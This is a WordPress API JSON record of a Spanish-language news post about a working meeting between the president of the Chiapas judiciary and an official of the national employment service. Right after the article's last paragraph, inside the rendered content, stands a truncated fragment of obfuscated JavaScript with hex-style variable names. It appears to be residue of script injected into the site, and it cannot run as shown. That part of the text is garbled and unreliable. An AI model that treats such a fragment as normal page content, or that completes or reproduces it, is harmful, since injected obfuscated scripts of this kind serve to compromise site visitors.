{"id":25323,"date":"2025-11-20T04:01:00","date_gmt":"2025-11-20T04:01:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25323"},"modified":"2025-11-20T04:01:01","modified_gmt":"2025-11-20T04:01:01","slug":"poder-judicial-fortalece-lazos-de-colaboracion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25323","title":{"rendered":"Poder Judicial fortalece lazos de colaboraci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"695\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-1024x695.jpg\" alt=\"\" class=\"wp-image-25324\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-1024x695.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-300x204.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-768x521.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-1536x1042.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-2048x1389.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000447141-110x75.jpg 110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>19 de noviembre del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, sostuvo una reuni\u00f3n de trabajo con el subsecretario del Servicio Nacional de Empleo, Marco Cancino Gonz\u00e1lez, en la sede judicial de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Durante este encuentro, dialogaron sobre las estrategias que comparten ambas instituciones para abonar al desarrollo social y fortalecimiento de entornos de bienestar, a trav\u00e9s de la capacitaci\u00f3n constante de las y los servidores.<\/p>\n\n\n\n<p>Con la presencia de Miguel \u00c1ngel Arrazola Gamen, Brenda Azucena Hern\u00e1ndez Hern\u00e1ndez, Jos\u00e9 Miguel Galindo Garc\u00eda y Alejandro Nango N\u00fa\u00f1ez; el magistrado presidente reiter\u00f3 la apertura del Poder Judicial para mantener puentes de cooperaci\u00f3n institucional que contribuyan a mejorar la calidad de vida en cada regi\u00f3n de la entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>19 de noviembre del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, sostuvo una reuni\u00f3n de trabajo con el subsecretario del Servicio Nacional de Empleo, Marco Cancino Gonz\u00e1lez, en la sede judicial de Tuxtla Guti\u00e9rrez. Durante este encuentro, dialogaron sobre las estrategias que comparten ambas instituciones para abonar &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25324,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25323","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25323","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25323"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25323\/revisions"}],"predecessor-version":[{"id":25325,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25323\/revisions\/25325"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25324"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25323"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25323"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25323"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}